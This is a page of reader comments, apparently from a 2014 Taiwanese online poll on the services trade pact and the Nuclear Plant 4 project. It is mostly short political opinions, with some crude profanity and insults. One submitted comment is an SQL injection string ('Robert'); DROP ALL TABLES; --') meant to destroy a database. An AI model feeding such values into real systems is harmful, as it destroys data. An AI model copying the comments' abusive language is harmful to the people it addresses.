<br><br>過或死的定義又疑惑,咱的過是要它通過,不是罪過!死是它不通過,台灣的經濟會死,和您設計的議題契合嗎?如果不契合,則有誤導之嫌!不釐清,投票正反比率即又誤,咱想應非咱一人的疑慮而已,未假思索投的票,在對方或第三者解讀未必一致,請參考!
<br><br>過保證未來大家有好日子過
<br><br>過是一定的
<br><br>過是過錯嗎?
<br><br>過啊!我們需要進步的條件。
<br><br>過啊
<br><br>過會比較好
<br><br>過還是不過吧!要死去哪裡?
<br><br>過
<br><br>過~台灣才有未來~只是反黑箱~~
<br><br>漫漫長言,是深深地感嘆,教育不是生意,是國力根本,孰重孰輕請政府單位思考,無論幼教師或教保員都需要更合理的對待,幼教從業人員一直無聲,也不代表該只聽業者發聲,各位朋友若盼望孩子能有優良的師資,請別漠視政府與立委,以「利」為政策方針。
<br><br>福貿沒過,臺灣死的更快,年輕人容易被搧動,天下事合久必分,分久必合,不要逆天而行。不獨漸統,等中國成長到臺灣可接受的一天,就是最好的結果。
<br><br>福貿最終是以台灣賣出給中國霸權。
<br><br>福貿當然要過,他們在抗義什,還罷站,真是無藥可救!
<br><br>福貿過與不過,百姓還是要靠自己奮鬥只是產品要大陸可免稅或低?稅,不過,只有高?稅,無競爭能力。
<br><br>福懋是中共統戰的手段,這方面中共已經有挑明直言了,儘管台灣需要在國際上站出來,但馬政府使用不公開且非民主的手段強行通過不平等條約,這對於大部份人民極為不公平,所以我不支持與中共服貿!
<br><br>管他媽媽嫁給誰,拿者小米用聯想,還要抗議?不自強死了算
<br><br>綠藉機搞政治拼選舉,那裡是真心為台灣人的幸福著想,藍長期對不起弱勢,貧富差距越來越大,也是讓台灣人的幸福每況愈下,我們都看在眼裏。
<br><br>網路公投是表現主流民意的好方法
<br><br>慢性統一
<br><br>說什麼會沖擊台灣本土產業、會有大陸人搶住房??
<br><br>說出想法吧!
<br><br>說還沒準備好的理由當藉口
<br><br>說蠻橫的主張代表民意?霸道的要求降低核四公投門檻叫無賴,他們應該摸著良心問問自己,
<br><br>酷哦!
<br><br>臺灣一定要和世界接連尤其是經濟,服貿是先決條件
<br><br>臺灣人很勤勞
<br><br>臺灣加油!!!!!!!
<br><br>臺灣加油
<br><br>臺灣別他媽再犯蠢了!已經連韓國一般都不如了!對岸都有原子彈,你反正也打不贏,還不如多賺點大陸錢!
<br><br>臺灣沒有本錢,臺灣不能自給自足,服貿不過,等於鎖國,是夜郎自大,誤國誤民!
<br><br>臺灣沒有農、林、漁、牧、礦 沒有貿易我們還有什麼
<br><br>臺灣的競爭力不是用說的來決定
<br><br>臺灣是法治國家 怎能讓黑箱作業產生的服務貿易協定條款通過 代議制度的缺失 人民有責改變 影響的就業人口甚多 現在的經濟已經衰退 人民對未來堪憂 如果想造就更大的公民行動 那就讓政府繼續蠻橫下去吧!
<br><br>臺灣從99年以來與中國的貿易就佔了總額的四成以上
<br><br>臺灣
<br><br>與其在一座島窮,不如在世界舞台死得其所。
<br><br>與敵人不承認你是國家簽約會過
<br><br>舞
<br><br>暴民別再鬧了
<br><br>暴民請理性!
<br><br>歐哲豪 說:
<br><br>憂。我相信,包括我在內的企業主都不會願意錄用這些年輕人,這些只會挑毛病確無法提出解
<br><br>憂心 憂心
<br><br>談什麼戀愛、po什麼文、拍什麼照啊
<br><br>請不要一天到晚抗爭,請還給我們一個安靜祥和的社會。
<br><br>請不要用意識形態自己嚇自己、為反對而反對!
<br><br>請不要把國家?濟給那幾個毛頭小子(帆!)破害啦
<br><br>請不要利用孩子
<br><br>請不要利用學生
<br><br>請不要混合一談
<br><br>請不要發簡訊騷擾我們!!!
<br><br>請不要越來越過分,越來越多自以為民意的人發起一個又一個的抗議,真的受夠了!
<br><br>請不要騷擾我操你媽雞掰王八蛋去吃共產檔的屎幹拎娘操雞掰
<br><br>請不要騙自己國人了
<br><br>請支持綠色全球宣言的經濟自由化
<br><br>請大家不要那麼恐
<br><br>請大家支持服貿
<br><br>請大家力挺服貿
<br><br>請大家自己想想這其中利弊
<br><br>請大家告訴大家
<br><br>請打開大門投服貿讚成票。給台灣一個開創的機會。鄧美生
<br><br>請有心刻意為自己炒作聲勢的人高抬貴手 放我最愛的台灣一條生路 不出聲不代表忍氣吞聲 只是不想再亂了
<br><br>請多想想小企業和小店家的弊
<br><br>請快過 東西一定都有利斃
<br><br>請抗議者執政看它們如何應對,不就好了,雖是險招,但也是好招,真面目讓社會大眾了解他們所做所為,是否真正為整個台灣人民。
<br><br>請找到替代能源在來反核 才有後路
<br><br>請你把數據公佈 黨工 辛苦你了
<br><br>請別把自己意見當做別人意見
<br><br>請別把綠色政黨給把服貿扯進來
<br><br>請到越南、印尼、大陸瞭解!臺灣再自閉就走不出去了!沒有免稅互惠那有笨蛋會買加稅的貨品?除非你有啃不完的富爸爸
<br><br>請表達意見的人確定自己有看過服貿全文,及每次會議內容,再表達自己正反意見。
<br><br>請服從多數選出來的總統和立委,不要再自以為代表民意了,也不要自以為在拯救台灣的未來,難道反對的都天才?支持的都腦殘?哪來到自信?
<br><br>請為後代子孫著想,而非有目的地反對。
<br><br>請政府把好壞跟人民說清楚。多多解釋這些定義。
<br><br>請重視台灣未來,年輕人短視只想到自己,你們不能代表全民
<br><br>請務必將投票結果透過有效的媒體公佈!
<br><br>請問你們背後是誰?不要打著公民民主的招牌!少來這套!連字體都是毫無美感的簡體字
<br><br>請問是現在政府版本的服貿呢?還是等到建立"兩岸協議監督條例"後審查的服貿?
<br><br>請問這是哪一種市場調查?願者上勾嗎?
<br><br>請踴躍參加
<br><br>請轉那些霸佔立院的人,為何自稱代表人民??我也是人民,我怎麼不知道我何時授權給他們了??
<br><br>誰知道禍心有多少?
<br><br>凝聚臺灣高度人心!
<br><br>學生不能代表我我不喜歡他的那種行為 自以為是
<br><br>學生不懂的事很多
<br><br>學生佔領立院
<br><br>學生如果不懂得尊重他人人權,無限上綱訴求,目無法際,猶如紅衛兵掘起,將會是台灣亂源之首,台灣所有經濟、人文,民主、族群將因為學運付出慘痛代價,永無寧日,好不容易的民主將破壞殆盡。學生、年輕人將自食惡果。
<br><br>學生根本不知社會的現實!台灣的經濟嚴重落後,服貿不過就等於鎖國!
<br><br>學生能夠代表全民嗎?只有鬧場而已給黨牽著
<br><br>學生畢竟是少數 表達訴求是好事 但請不要被煽動成為暴民 不要再自恃學生身份 影響他人公民權益
<br><br>學生滾回去好好讀書
<br><br>學生讀好書有本事不怕找不到工作跟服貿沒關係服貿過工作機會更多。
<br><br>學運只代表少許人的聲音,不是全台灣人之聲音,核四也如此
<br><br>學運很好玩是吧
<br><br>學運就學運
<br><br>憑什麼讓林飛煩來幫我們決定?
<br><br>操你媽假投票真洗腦黨工下去領毛
<br><br>歷年人均GDP對比。
<br><br>適當的開放,要是對公民沒有太多的幫助,只會造成對台灣的混亂。
<br><br>駝鳥心態是現今青少年的通病,「反服貿」永遠走不出自己,走不出台灣;唯有競爭壓力才是推動進步強大的要素;「服貿過」就如木瓜在有危機感的壓力下,一定會結出甜美肥大的果實一樣。如果能配合適當機制:如- 要求媒體全面擴大台灣優勢的宣傳、鼓勵大眾愛用國貨、以凡事要求更進一步的心態;相信在任何國際合作的體制下,台灣必能創下佳績,且會內部更加團結,不分藍、綠一致對外。
<br><br>蕭萬長、彭淮南及各大企業龍頭,以及美國在台協會主席及前主席均贊同。
<br><br>選項極端,含意不清...無效調查
<br><br>選過的都是大陸人吧
<br><br>遲早要過,就算不過,上有政策下有對策,人家一樣都會想辦法來,不開這大門,又要搞國家自閉嗎
<br><br>錯
<br><br>應該先立法審核再通過服貿
<br><br>應該是要問(希望通過)或是(不希望
<br><br>擦
<br><br>還有核四/支持核能
<br><br>還自以為台灣很厲害嗎?
<br><br>還是服貿?
<br><br>雖要過 但別急
<br><br>簡體字?請改成繁體再來!
<br><br>藍綠在這樣吵,服貿就算過了,台灣也沒啥未來
<br><br>藍綠政爭已死,未來只有公平正義之爭!
<br><br>鎖島的保護主意是豬的行為,效法韓國吧!
<br><br>鎖國!就是以後日子苦了!
<br><br>鎖國一定死。
<br><br>鎖國只有死路一條
<br><br>鎖國只會讓年輕人變啃老族
<br><br>鎖國政策政黨族群爭亂不斷
<br><br>鎖國會邊緣化,全球化是趨勢,我們不能原地踏?。台灣沒有資源,只得靠吸引人才、培育人才,發展精緻農業,研發、通過服貿減稅可能與他國競爭。
<br><br>鎖國,是不可能的!
<br><br>擾民壞序,非全民意,投票屬性,給我?濟,超越藍綠,不是孤意,聚眾全力。
<br><br>贊!
<br><br>贊成服貿通過
<br><br>贊成過但政府的配套要有
<br><br>贊同
<br><br>難怪以前野百合那麼快結束
<br><br>難怪會輸共產黨,動員另外一種聲音抗衡嘛!
<br><br>難道你怕自己輸了他們?
<br><br>難道要鎖在島內嗎
<br><br>難道要鎖國?
<br><br>難道拿東西給我吃 我就要吃喔
<br><br>題目設計有嚴重瑕疵,此投票不會準確
<br><br>蘋果日報是非不分
<br><br>蘋果大嘴--微言大義,政經猛料出品人
<br><br>蘋果大嘴...加油!加油!加油!
<br><br>議題應該寫清楚:目前的服貿條約你1.贊成2.反對。不知:服貿「死」是何意?
<br><br>黨工少裝假中立
<br><br>灌水吧!
<br><br>爛死了
<br><br>爛問題,別制造對立!
<br><br>爛貨少數人假借民主愛台灣綁架整個台灣氣死人了
<br><br>爛調查!設計這民調的人必定跟馬一樣卑賤
<br><br>爛調查
<br><br>競爭才會進步、要有突破
<br><br>讓人才去大陸發展,叫做人才外流;
<br><br>讓人才走出去,叫做人才外流。
<br><br>讓人才走出去,叫做人才外流
<br><br>讓人才走進來,叫做木馬屠城。
<br><br>讓人民一同討論才是重要的
<br><br>讓人質疑
<br><br>讓大陸人才進來,卻視為木馬屠城;
<br><br>讓全民參與吧!
<br><br>讓台灣有好日子過。
<br><br>讓台灣的經濟起吧...反對的小朋友(反對的大學生)...
<br><br>讓台灣注入熱錢,增加商業行為。
<br><br>讓我們出去,別人進來
<br><br>讓陸資流進來,叫做收買台灣;
<br><br>讓資金投進大陸,叫做淘空台灣;
<br><br>讓資金流出去,叫做淘空台灣。
<br><br>讓資金流出去,叫做淘空台灣
<br><br>讓資金流進來,叫做買下台灣。
<br><br>讓資金流進來,叫做買下台灣
<br><br>囉嗦
<br><br>顧肚子要緊,政治操作沒興趣!
<br><br>權力的保衛戰中。
<br><br>讚!
<br><br>讚
<br><br>肏你嗎雞吧
<br><br>恁爸是勇敢的台灣人
<br><br> 不要核電,卻要用電
<br><br> 不要龍燈,中國要!
<br><br> 月營收30億。
<br><br> 人家讓你賺錢,叫做收買人心
<br><br> 去了解一下
<br><br> 去包圍這些反對的
<br><br> 去找這些團體,
<br><br> 以前反對,現在也反對,
<br><br> 叫他們給你一個公道。.
<br><br> 台灣人很有趣!
<br><br> 年營收1400億。
<br><br> 年營收300億。
<br><br> 投資1260億。
<br><br> 投資250億。
<br><br> 要反壟斷又想壟斷媒體
<br><br> 要司法公正又拜託法外開恩
<br><br> 要地區發展又不要國光石化
<br><br> 要欺負警察又叫警察保護
<br><br> 要經濟發展又不要服貿協議
<br><br> 當初拒絕這些的是哪些人?
<br><br> 團體,政黨,學者!
<br><br> 讓人才走進來,叫做木馬屠城
<br><br>Stanley郭
<br><br>"服貿"是台灣走向國際舞台的必經之路.台灣不走向國際舞台很可能會跟'冰島'一樣國家破產。現在的執政黨正帶領我們走向正確的路.我們應該給予支持.不該拘於小節.不該阻礙搗亂。先前的學運真的是在濺踏'民主',那只是某些少數'代表'表決輸了刻意安排學生出來鬧事,把我們當笨蛋.但是那些人的'奧步',讓我們看的更清楚.讓我們更堅信.支持現在的執政黨將來才有飯吃.才會有一個安定的生活.所以本人支持服貿.更支持警察行使合理的公權力.維護國家的和平安定,請那些少數人服從多數人的選擇.這才是真正的民主。以上是小弟我的淺見。請多指教。
<br><br>(看看台灣為下一代作的不就是逼他們走入絕路嗎)
<br><br>1、三十年前,帶金耳環的,基本上都是市?人; 三十年後,帶金耳環的,基本上都是鄉下人!
<br><br>10、三十年前,有錢說沒錢; 三十年後,沒錢裝有錢。
<br><br>11、三十年前,借錢要去拜託銀行;三十年後,銀行要來拜託你去借錢。
<br><br>12、三十年前,能買到便宜東西,人人羨慕; 三十年後,誰買的東西昂貴,才有身價。
<br><br>13、三十年前,穿破洞和補丁衣服的,是因為“窮”;三十年後,花錢買窟窿和補丁衣服的,是想擺“酷”。
<br><br>14、三十年前,一人工作,能養活全家數口;三十年後,倆人上班,難養活一個小孩。
<br><br>15、三十年前,往往為飯不夠吃發愁; 三十年後,常常因孩子少吃操心。
<br><br>16、三十年前,胸罩吊帶和?褲頭,露出算不雅; 三十年後,胸罩和?褲頭,到處看得到、算流行!
<br><br>17、三十年前,考上大學很難、三十年後?考上大學也很難。
<br><br>18、三十年前,你把人睡了一次,那人一輩子都是你的,三十年後,就算睡了多少次,人還不一定是你的。
<br><br>19、三十年前,住在鄉下,人人都是狗仔隊,三十年後,人人都怕狗仔隊。 20,三十年前,透早就出門,為著顧三餐,三十年後,有三餐卻吃不下。 21,三十年前,家有一老如有一寶,三十年後,家有一老,全家逃跑。
<br><br>1990年 8132 : 341 25.3倍
<br><br>1991年 9008 : 353 25.5倍
<br><br>1992年 10589 : 417 25.6倍
<br><br>1993年 11077 : 517 21.4倍
<br><br>1994年 11991 : 467 25.6倍
<br><br>1995年 12906 : 601 21.4倍
<br><br>1996年 13527 : 699 19.3倍
<br><br>1997年 13904 : 771 18.0倍
<br><br>1998年 12679 : 817 15.5倍
<br><br>1999年 13069 : 861 15.1倍
<br><br>2、三十年前,三十幾歲看起來像五、六十歲的人很多; 三十年後,五、六十歲看起來像三十幾歲的人也很多。
<br><br>2岸文化差異太大,房地產法規大不相同
<br><br>20%沒意見....這種比較是有問題
<br><br>2000年 14519 : 946 15.3倍
<br><br>2001年 13093 : 1038 12.6倍
<br><br>2002年 13291 : 1132 11.7倍
<br><br>2003年 13587 : 1270 10.6倍
<br><br>2004年 14663 : 1486 9.8 倍
<br><br>2005年 15714 : 1710 9.1 倍
<br><br>2006年 16111 : 2022 7.9 倍
<br><br>2007年 16855 : 2560 6.5 倍
<br><br>2008年 17116 : 3260 5.2 倍
<br><br>2009年 16392 : 3678 4.4 倍
<br><br>2010年 18303 : 4283 4.2 倍
<br><br>2011年 21592 : 5184 4.1 倍
<br><br>2012年 22000 : 5608 3.9 倍
<br><br>2014-04-30 20:43:57
<br><br>2014-04-30 20:44:10
<br><br>2014-04-30 20:44:20
<br><br>2020年 28000 :13000 2.1倍
<br><br>22K怪政府,
<br><br>3、三十年前,尼姑、和尚出來“化緣”;三十年後,尼姑、和尚出來“賑災”。
<br><br>4、三十年前,鄉下的人想辦法到市?; 三十年後,市?人想辦法回鄉下。
<br><br>40%的人被洗腦
<br><br>426不要來亂
<br><br>5、三十年前,穿花衣服和紅衣服的, 往往是小姑娘; 三十年後,穿花衣服和紅衣服的,常常是中老年。
<br><br>6、三十年前,人們盼望怎樣才能“長胖”; 三十年後,人們考慮怎樣盡快“減肥”。
<br><br>689去死
<br><br>7、三十年前,窮人才吃野菜和蕃薯;三十年後,富人愛吃野菜和蕃薯。
<br><br>8、三十年前,政府號召“高山墾荒、增產報國”;三十年後,政府要求“水土保持、還林還地”。
<br><br>9、三十年前,富人穿尼龍衣,窮人穿棉布衣;三十年後,窮人穿尼龍衣,富人穿純棉衣。
<br><br>?了下一代我反對服貿
<br><br>?了未來的光明加油
<br><br>?了選舉才冒出來的學運,這就是台灣的政治
<br><br>?我們走出去
<br><br>?給給你方便當成是隨便
<br><br>?貿不能過,中國要拼?野心,台灣人要過自由的社會生活。
<br><br>?貿是死!
<br><br>??不?
<br><br>??超越藍綠,公民自救???服貿是「過」還是「死」,我們來選!
<br><br>die die die
<br><br>Don't wanna be Chinese
<br><br>DROP ALL TABLES
<br><br>Face the reality,
<br><br>For future and for young guy , without this young guy future will be limite for well.
<br><br>For young generation! Disagree to sign
<br><br>fuck you!
<br><br>Gffyczsrujvdse
<br><br>good
<br><br>Good
<br><br>Hahahaha
<br><br>hello
<br><br>Helo
<br><br>i hate spam
<br><br>Is that fake??
<br><br>It sucks
<br><br>Just do it'
<br><br>Keep rocking:)
<br><br>Loser請下跪道歉
<br><br>Nothing
<br><br>OK
<br><br>OK !
<br><br>OMG How?!
<br><br>Pass!!
<br><br>Really?
<br><br>Robert'); DROP ALL TABLES; --
<br><br>So what?
<br><br>test
<br><br>thank
<br><br>TKS!
<br><br>Totally Against it!
<br><br>We aren't scare of competitions, bring it on
<br><br>We'd shut down this brainless hovernment as quickly as possible
<br><br>whats this?
<br><br>wtf
<br><br>YA
<br><br>You
<br><br>You media fucked up this country already, I do not think you could make up anything.
<br><br>Zzzzzzzz
<br><br>[先]求合作,[再]合中避害求利; [合作]是必然 ,[避害求利]靠智慧; [必然]是趨勢是宿命也是順者昌逆者亡,[智慧]也才有空間存在與展現的價值。
<br><br>
<hr>
我們公布駭客蒐集到的部分民眾<strong>核四</strong>意見如下:<br>
<hr>
<br>
「科技始終來自於人性的懶惰」台灣文明科技必須走向進步。今台灣因為過於民主已造成太多無理性的抗爭,真的是為人民謀福祉?子孫謀長遠的路嗎?現今台灣已無公民倫理道德可言,君臣子民?抗議無所不其極,這些做法將都會是孩子的倒影,爾後休怪子孫背倫理而不忠不孝。
<br><br>(1)核四蓋的安全嗎?
<br><br>(2)核廢料放哪裡?
<br><br>(3)台灣現有的三座核電場,現在核廢料還囤積了多少在冷卻池裡?
<br><br>(4)政府要積極,限電的方案,使用者付費,要有迫力,不是拿沒有電可用,或漲四成來嚇唬人民。
<br><br>不反核,但反核四。
<br><br>不反對核能發電,但不同意用荒蕪十幾二十前的設計與設備運轉。
<br><br>不用核電以後大家都等著漲價吧 就不要漲價又在哪邊叫來叫去然後罵政府無能 最無能的就是一天到晚在抗議的人
<br><br>不好
<br><br>不安全的建設會毀滅台灣。
<br><br>不安全的國家何以跟國際競爭?
<br><br>不走 核能台灣如何走下去還要百姓增加電費負擔嗎民進黨執政能保證費核嗎 還是林義雄可以保正任何政黨執政都會廢核?
<br><br>不怕一萬只怕萬一。
<br><br>不怕一萬就怕萬一,小島之國未來子孫不能因我們的享受而留下禍害,政客太多擁有綠卡出事誰會負責,早就大難來時逃命去了,自求多福!
<br><br>不明白廢核為何總和台獨或馬英九執政的問題綁在一起,那些人都好兇喔
<br><br>不知吃了多少錢
<br><br>不建核四,以後電費直直漲...
<br><br>不建核四,到時候核123都停止運作,全台剩火力發電,然後電費上漲,才又抱怨政府。且火力發電汙染也是直接造成。何不建核四停然後核123。並要求台電將核四透明化,每年編列預算來做安全檢測才是現階段應執行的。
<br><br>不建核四,將來供電不足沒電可用,怎麼辦?
<br><br>不建核四哪來的電力?台灣本來就缺乏天然資源,電力還需仰賴進口,沒能力的人天天喊電費貴,現在要建核四又說要安全家園,台灣的核電管理的世界排名名列前茅,試問台灣人在怕什麼?別因為執政黨的關係而去極力否定一件應該的事情,為了中華民國而努力別為了單一執政黨而盲目
<br><br>不建核四電費也漲.不建核四台電白領階級也領高薪及年終!
<br><br>不建核電,照樣有核害。暖化更嚴重。
<br><br>不是反核,是不信這個核4的品質
<br><br>不毒
<br><br>不要「我說了算」。
<br><br>不要一直政黨惡鬥,百姓光繳稅快繳死了,請政府處理一下車子稅務問題,為什麼老車跟新車稅金都一樣呢?
<br><br>不要工廠,卻要高薪,
<br><br>不要用欺騙的民調欺騙人
<br><br>不要只有我們這代在爽,害死了代代的子孫!
<br><br>不要只是一直?核能不好,就算廢了核四那有找到代替核四的方法嗎?燒更多煤炭來填補?拜託好好的想想吧!
<br><br>不要台電捂弄人民的智慧
<br><br>不要有核四,拜託,台灣是大家的。
<br><br>不要再把不定時炸彈開啟了。
<br><br>不要再核五了
<br><br>不要再浪費我們的錢跟生命
<br><br>不要再寄垃圾信給我
<br><br>不要再發簡訊給我了!
<br><br>不要再傳一些有的沒的給我!煩不煩!
<br><br>不要再藍來綠去了,是非對錯判斷有這麼困難嗎?
<br><br>不要再藉核四貪汙了
<br><br>不要在吵了
<br><br>不要忘記2000年所積極告訴世人!+_2度C會給地球帶來毀滅!如今要乾淨的能原,不要再增加二氧化碳的排放!核四應該比幾十年前的舊核電場進步!安全!如今希望核四的運轉日!是核一,核二的停機日,才合理吧!
<br><br>不要把污染留給子孫、留給供養我們的大地。
<br><br>不要把核電廠蓋在地震帶上
<br><br>不要每次選舉,就拿停建核四的議題,
<br><br>不要空談替代能源,沒有那麼容易,注意核安全就好了。
<br><br>不要服貿,韓國要!
<br><br>不要建核4
<br><br>不要為了利益而害了下一代
<br><br>不要毒害
<br><br>不要限電,影響生計,阻礙經濟發展!
<br><br>不要核四你要什麼?全球暖化夠嚴重了
<br><br>不要核四
<br><br>不要核電,卻要用電。
<br><br>不要核電怕有核災,但大陸的沿岸隨便一個核電廠發生核災我們也跑不了!
<br><br>不要鬥爭,做好,慢慢開發新電源,教育人民節約能源
<br><br>不要就是不要、我們可以不用電、我們要安全的生活?請留安全的環境給下一代
<br><br>不要亂再發自以為是,誤導別人假裝中立的簡訊了!
<br><br>不要濫用民主!我挺節約能源!
<br><br>不要隨意點擊來路不明的簡訊內容
<br><br>不要龍燈,中國要!
<br><br>不要繼續套牢拼裝車
<br><br>不核四?難道要蓋10座火力發電廠嗎?天然資源又這麼少
<br><br>不能因被飯噎到就不吃飯,不能因被水噎到就不喝水,我們應該設法解決不被噎到才是正道。
<br><br>不乾淨,危害後代
<br><br>不然沒辦法支持核四
<br><br>不然靠什麼發電?
<br><br>不填充怎麼有電啦!
<br><br>不想從今以後讓電費大口的啃食我的荷包呀!
<br><br>不想等核災才來哭天喊地
<br><br>不想變成下個輻島
<br><br>不管政府如何做都不對,除了他們來執政,打者民主反民主!
<br><br>不需要核四為了台灣好
<br><br>不蓋核四電費漲
<br><br>不廢永遠有口水。福島事件有機會在台重演
<br><br>不論投票結果如何我們尊重民主的決定請不要再用暴力手段使得社會不安
<br><br>不論現行台電主掌台灣電力資源有多麼大的黑幕或弊端,結構有多大的不合理,不可否認的核電在無安全顧慮的情況下仍是最環保最有效率及便宜的能源。改革弊端與發電是完全不同的兩個命題毋需牽連併敘,單純就電力生產供需現實考量,現實上不發展已投入大量資金、已具一定規模、已佔一定比率電力來源又無其他短期內就可替代方案下、沒有具體核安顧慮下的想像恐懼感無端幹擾下,驟然宣佈停工核四興建誠然為民粹治國,民眾無知噪進喧騰肇因於政客為反對而反對的本質,主政者的盲目民主錯誤因應,實為政府無能的表現,是不負責任的政府,不尊重專業的最大敗筆。民主絕非民粹也絕非絕食的個人行為可以綁架民意,而植基於同情。沒有電毀壞了一國之正常發展與斷送競爭力,一絕食者的個人行為導致千家萬戶失牯待糧飢餓待哺,核害未現已民無活路,這才是真正的無視必然發生的惡果。日本主政者豈有不知核電之害卻仍於剛剛受到核電之災後又再貫徹核電既定永續發電計劃,雖然國內一樣如台灣般反核,依然堅持核電不可停,是以政府的高度作出為後代子孫,為國家整體發展,為國家世界競爭力作出負責的決策。綜上;核電應正常開發,並配套完善縝密的核安管控,大力宣導以安民心,對無依據的言論惑眾之政治人物或團體予以應有之制裁,其標準應提高四到國安層級,以安定社會,以儆效尤。
<br><br>不論現行台電主掌台灣電力資源有多麼大的黑幕或弊端,結構有多大的不合理,不可否認的核電在無安全顧慮的情況下仍是最環保最有效率及便宜的能源。改革弊端與發電是完全不同的兩個命題毋需牽連併敘,單純就電力生產供需現實考量,現實上不發展已投入大量資金、已具一定規模、已佔一定比率電力來源又無其他短期內就可替代方案下、沒有具體核安顧慮下的想像恐懼感無端幹擾下,驟然宣佈停工核四興建誠然為民粹治國,民眾無知噪進喧騰肇因於政客為反對而反對的本質,主政者的盲目民主錯誤因應,實為政府無能的表現,是不負責任的政府,不尊重專業的最大敗筆。民主絕非民粹也絕非絕食的個人行為可以綁架民意,而植基於同情。沒有電毀壞了一國之正常發展與斷送競爭力,一絕食者的個人行為導致千家萬戶失牯待糧飢餓待哺,核害未現已民無活路,這才是真正的無視必然發生的惡果。日本主政者豈有不知核電之害卻仍於剛剛受到核電之災後又再貫徹核電既定永續發電計劃,雖然國內一樣如台灣般反核,依然堅持核電不可停,是以政府的高度作出為後代子孫,為國家整體發展,為國家世界競爭力作出負責的決策。綜上;核電應正常開發,並配套完善縝密的核安管控,大力宣導以安民心,對無依據的言論惑眾之政治人物或團體予以應有之制裁,其標準應提高到國安層級,以安定社會,以儆效尤。
<br><br>不營運,電就又漲,是不是就又眼變另一場抗爭呢
<br><br>之前通過一定有它的道理,都做了就完成它吧!我不相信大家會在大熱天不開冷氣,寒冷冬天不開暖氣,看看這些冷死或熱死的人有多少!
<br><br>什麼公投?降低門檻,民進黨不是很有信心嗎?未何要降低?4/1的人,又如何表全國人民的決定呢?
<br><br>今天都活不下去,講什麼未來,告訴我什麼是便宜沒污染的能源
<br><br>公佈投票數量
<br><br>公開投票真實性的結果。
<br><br>公道自在人心,支持政府繼續建設核四
<br><br>公營已經夠錢坑,永遠不夠滿足收賄人口袋,只是誘惑更多人!更何況全世界G8工業國電價也都比我們高~用核電只有永遠跟不上別人的理由!台灣加油
<br><br>切勿禍延子孫
<br><br>勿讓中共同路人-國民黨得逞!
<br><br>反!
<br><br>反正要就盡快建,要就徹底停建,不要停工再來
<br><br>反污染
<br><br>反服貿、廢核四、我愛台灣、
<br><br>反服貿的人可能就是逢中必反的人
<br><br>反服貿是全民喝?北風的開始
<br><br>反服貿廢核四
<br><br>反核!
<br><br>反核人士請他家先不用電再來反核電吧!
<br><br>反核四不反核!政府不該便宜行事。
<br><br>反核四不反核
<br><br>反核四
<br><br>反核的人實在很沒常識.台灣不靠核電.難道每日全省限時區域供電嗎?不靠核電跟本沒電可用
<br><br>反核的人請問你們:如果廢核四後,要用什麼樣的發電替代?燒煤嗎?還是太陽能?每樣都比核能發電貴,不是嘴巴喊反核而已,要提出解決相關的替代方案才是負責任。
<br><br>反核的人 不要不同意以後會漲電費
<br><br>反核的夏天就別開冷氣
<br><br>反核啦!政客不要太短視因為你現在的愚蠢白癡白目危害社會大眾傷天害理傷風敗俗腦子裝屎眼睛滿滿蛤蟆肉的低能弱智決定將導致你子子孫孫世世代代都是畸形兒!你再為了錢阿!等你死了再留給你子孫去看病阿!弱智政客!殘害無辜的台灣民眾!殘害乾淨的台灣淨土!就因為你一個敗類!你列祖列宗以你為恥!你媽一定很後悔當初沒有把你流掉!你爸一定很後悔沒把你射進垃圾桶
<br><br>反核愛臺灣
<br><br>反核
<br><br>反對利用民主之說,破壞法治社會,台灣是世界有名治安良好居住地,民風善良。不容政客,白目學生影響台灣國際形象。
<br><br>反對者,請拿出更好的辦法,再發聲!
<br><br>反對服貿?廢除核電?
<br><br>反對風險甚?的核四,支持用那筆錢來開發其他綠色能源
<br><br>反對核四的請提供綠能配套不要為反對而反對要享受電力只會出一張嘴難怪台灣不會進步政客們滾開
<br><br>反對核四是因為它不安全
<br><br>反對核四
<br><br>反對通過服冒協議
<br><br>反對黑箱服貿 反對拼裝核四 反對腐爛國民黨
<br><br>反對
<br><br>天下沒有白吃的午餐。
<br><br>天下沒有絕對的事,核電聲稱?對安全,令人無法信任,不怕一萬,只怕萬一,不要把萬一留給子孫,別的國家要怎麼?動,那是他們的事。
<br><br>天佑台灣,好在有你,明天會更好!核4是老調重彈,還是公投(民近檔)還要留下來亂台嗎?
<br><br>天然災害引發顯出了核能危機,就是在告訴我們,既然不能處理核廢料,就不應該再發展核能發電!
<br><br>太可怕了
<br><br>太危險了會危害下一代的
<br><br>太危險 全拆了 重建似乎好點
<br><br>少數人的發聲作秀不能代表我,我的聲音想法只能由我決定,誰也不能代表。
<br><br>少數?從多數
<br><br>支持!廢核一蓋核四
<br><br>支持˙讚˙台灣才有救
<br><br>支持˙
<br><br>支持公民運動
<br><br>支持反核請提出有效可行的替代方案,不然以後限電措施優先由你個人自身配合,若是仍不足再由你的親屬一同響應,而不要只是為了反對而反對
<br><br>支持民主支持學運
<br><br>支持全面停建核四及一二三停運轉
<br><br>支持好的核能,不支持核四
<br><br>支持或停建各有利弊,個人建議停見,已所不欲勿施於人,我不想核電在我家旁邊,所以我也不會想看核電蓋在別人家旁,如果你們支持續建啟用,我也尊重,但麻煩核電移到你家旁,或郭董你不是很有錢很想出資嗎,那就拿錢出來蓋在你家或工廠旁阿
<br><br>支持服貿,核四有核安核四續建,備用。
<br><br>支持服貿、支持興建核四
<br><br>支持服貿!
<br><br>支持建完核四,但暫不運轉
<br><br>支持非核家園,就停電吧!
<br><br>支持政府的判斷
<br><br>支持政府政策
<br><br>支持核四,不過要成立專業小組監督
<br><br>支持核四,別亂傳簡訊。
<br><br>支持核四!
<br><br>支持核四供電運轉
<br><br>支持核四的人就將核能廢料放在他家
<br><br>支持核四的民眾應該接著支持廢料放你家!
<br><br>支持核四提升經濟競爭實力!
<br><br>支持核四替換核一
<br><br>支持核四填充燃料
<br><br>支持核四運轉,核一、二?三屆齡除役
<br><br>支持核四運轉
<br><br>支持核四廢核1、2
<br><br>支持核四興建,廢除核一核二
<br><br>支持核四燃科填充
<br><br>支持核四燃料填充!
<br><br>支持核四燃料填充
<br><br>支持核四續建蓋完
<br><br>支持核四續建
<br><br>支持核四
<br><br>支持核四 台灣才會進步
<br><br>支持核四 運作,核一/核二 可除役。
<br><br>支持核電,暖化歸零
<br><br>支持核電能,核安要確保。
<br><br>支持核電
<br><br>支持核4
<br><br>支持核4,5,6,.....
<br><br>支持停止核四
<br><br>支持停建核四 大家加油
<br><br>支持國家大計
<br><br>支持國家政策
<br><br>支持國家發展及環境保護共存
<br><br>支持就是支持沒有什麼好說的
<br><br>支持無核家園
<br><br>支持填充以後不建且關核一
<br><br>支持徹底停止核四建設
<br><br>支持運?
<br><br>支持綠色能源
